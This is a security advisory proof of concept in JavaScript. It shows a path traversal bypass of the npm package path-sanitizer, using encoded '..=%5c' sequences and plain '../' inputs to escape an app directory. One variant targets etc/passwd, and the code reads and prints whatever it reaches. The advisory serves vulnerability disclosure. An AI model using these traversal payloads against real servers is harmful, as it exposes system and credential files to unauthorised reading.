GHSA-94p5-r7cc-3rpr

const sanitize = require("path-sanitizer") const path = require("path") const fs = require("fs") // Real scenario: function routeHandler(myPath) { // Lets just assume that the path was extracted from the request // We want to read a file in the C:\Users\user\Desktop\myApp\ directory // But the user should be able to access C:\Users\user\Desktop\ // So we need to sanitize the path const APP_DIR = "/var/hacker" const sanitized = path.join(APP_DIR, sanitize(myPath)) // Now we would usally read the file // But in this case we just gonna print the path // console.log(sanitized) return sanitized } function readFile(filePath) { const absolutePath = path.resolve(filePath) // Resolve to absolute path fs.readFile(absolutePath, "utf8", (err, data) => { if (err) { console.error(`Error reading the file: ${err.message}`) return } console.log(`Contents of the file ${filePath} :\n${data}`) }) } input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt" // input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd" input_user_payload = "../../../../../../../../tmp/hacked.txt" readFile(routeHandler(input_user_bypass)) readFile(routeHandler(input_user_payload))